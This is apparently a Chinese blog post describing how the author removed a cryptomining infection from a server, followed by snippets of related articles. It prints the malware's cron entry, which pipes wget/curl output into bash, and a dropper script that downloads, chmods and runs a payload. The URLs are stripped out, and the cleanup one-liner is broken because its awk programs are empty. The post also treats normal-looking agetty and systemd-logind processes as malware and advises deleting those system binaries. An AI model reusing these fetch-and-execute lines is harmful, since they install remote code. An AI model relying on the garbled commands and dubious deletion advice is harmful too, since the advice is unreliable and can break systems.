一次伺服器中病毒挖礦事件處理

2021-09-19 05:24:36 字數 1865 閱讀 8730

事情是這樣的,發現 rabbitmq 服務響應非常慢,可以說是基本不響應、無法提供服務了。這時就去伺服器上面檢視,發現 cpu 的資源被乙個叫做uxyhf8的程式嚴重占用。

看到 cpu 飆公升太高,發現這個程式也不是自己所知道的任何乙個程式,所以就懷疑中挖礦病毒了。首先把這個程式給kill掉,只能先kill掉了,不然卡的都快無法操作了。

# 34534:挖礦程式的 pid

$ kill -9 34534

這時 cpu 的資源已經被釋放,rabbitmq 服務也正常了。但是好景不長,沒過幾分鐘就又出來乙個新的未知程序iufh8f(事後經過測試,新程序出現的時間在幾分鐘到幾十分鐘變化),這時就想到是不是有定時任務,檢視定時任務:

$ crontab -e

10 * * * * (wget -qo- -u- || curl -fskl -a- || wget -qo- -u- || curl -fskl -a- || wget -qo- -u- || curl -fskl -a- || wget -qo- -u- || curl -fskl -a- || wget -qo- -u- || curl -fskl -a- )|bash

i.sh指令碼內容多變,大致如一下:

# i.sh 指令碼的內容是

exec &>/dev/null

if ! ps -p $(< /tmp/.x11-lock); then

x=./.y

wget -qu- -m) -o$x;chmod 777 $x;$x;rm -f $x

fi

發現了這麼乙個定時任務。把它刪掉並清理所有定時相關檔案:/etc/cron.d目錄下、/var/spool/cron/目錄下。至此結束(自認為結束)。

在第一次處理的結果上發現過段時間,挖礦程式又出現了。這是知道問題沒有那麼簡單。可能還殘留病毒檔案。最後找到幾個病毒程式,如下:

/usr/lib/systemd/systemd-logind

/sbin/agetty

/sbin/agetty

$ ps aux | grep -v grep | grep "agetty"

root 26432 0.0 0.0 110044 824 tty1 ss+ 15:15 0:00 /sbin/agetty --noclear tty1 linux

root 26434 0.0 0.0 110044 784 ttys0 ss+ 15:15 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttys0 vt220

$ ps aux | grep -v grep | grep "systemd-logind"

root 502 0.0 0.0 24204 1680 ? ss 2018 0:52 /usr/lib/systemd/systemd-logind

先刪掉病毒檔案

殺死病毒程式,一定要多執行幾次,我執行了好幾次才殺掉。

$ ps aux | grep -v grep | grep "agetty" | awk '' | xargs kill -9 && ps aux | grep -v grep | grep "systemd-logind" | awk '' | xargs kill -9
至此,完全搞定。

伺服器被植入挖礦病毒的處理

伺服器被植入挖礦病毒的處理 故障描述 一台伺服器一直在向外傳送網路包,導致該網段網路擁堵。同時我司的一台伺服器也出現了同樣的情況,不斷往外發包,導致網段擁堵 經過排查,發現該機器被植入挖礦病毒,部分偽裝成系統檔案,占用cpu及網路,病毒程序分別為 system wipefs ps cranberry...

伺服器處理挖礦

使用top查詢程序 某個程序占用cpu或記憶體過分,查之 如 進入目錄,分析裡面的檔案,進入 etc下,分析如update類似的檔案。處理過程 chattr i 檔案 rm rf 檔案 如果是root使用者感染的病毒 vim etc selinux config 將selinux disabled改...

雲伺服器的挖礦病毒。

朋友的阿里雲放著沒用了,我就借來打算放兩個小東西上去,結果一上去看到cpu 100 我的天,如果這是個windows,我就要開始懷疑他是不用這個來看愛情片。當在cpu爆滿。使用top命名會發現有若干個程序長期占用及高的cpu,那麼問題就出在這些程序上,想都不用想kill 9 pid瞬間消滅!垃圾病毒...